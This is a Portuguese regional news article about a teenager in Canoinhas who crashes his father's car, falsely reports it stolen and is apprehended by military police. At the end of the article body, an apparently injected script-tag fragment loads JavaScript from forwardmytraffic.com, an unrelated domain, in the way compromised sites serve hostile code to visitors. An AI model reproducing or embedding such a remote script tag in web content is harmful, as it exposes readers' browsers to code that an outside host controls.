InícioDestaquePM DE CANOINHAS: ADOLESCENTE SE ENVOLVE EM ACIDENTE DE TRANSITO E COMUNICA...

PM DE CANOINHAS: ADOLESCENTE SE ENVOLVE EM ACIDENTE DE TRANSITO E COMUNICA FALSO CRIME

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Na tarde de quarta-feira, 02, por volta das 17h15, equipes da PM de Canoinhas foram acionadas via Copom 190 para deslocar na estrada Geral do Cerrito, localidade de Cerrito no município de Canoinhas.

 

 

No local, foi verificado que um veículo Fiat Palio estava danificado após ter colidido contra um barranco. O condutor estava ausente e populares informaram que um jovem, moreno de aproximadamente 17 anos, pediu ajuda e após a negativa saiu correndo sentido centro.

 

 

Entrado em contato com o proprietário, este relatou que o veículo havia sido furtado, pois seu filho havia chego em casa e relatado tal situação, inclusive ligou e acionou a Polícia Militar. As equipes da PM iniciaram buscas e em conversa com terceiros, onde um homem relatou que um jovem moreno, chegou a pedir ajuda e relatou ter batido o carro do seu pai. Diante dos fatos foi conversado com o adolescente e ao questionar sobre este ser o possível condutor do carro, este negou, porém, a testemunha reconheceu o mesmo como sendo a pessoa que havia solicitado ajuda.

 

 

O adolescente ao saber acabou confessando que ele foi o condutor e acabou ligando pra PM comunicando um falso crime, a fim de retirar sua culpa. Das situações apuradas, foi constatado que o adolescente acabou cometendo o crime de dirigir veículo automotor sem habilitação ou cassada, gerando perigo de dano e falsa comunicação de crime. Sendo assim, o adolescente foi apreendido e conduzido para providencias…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.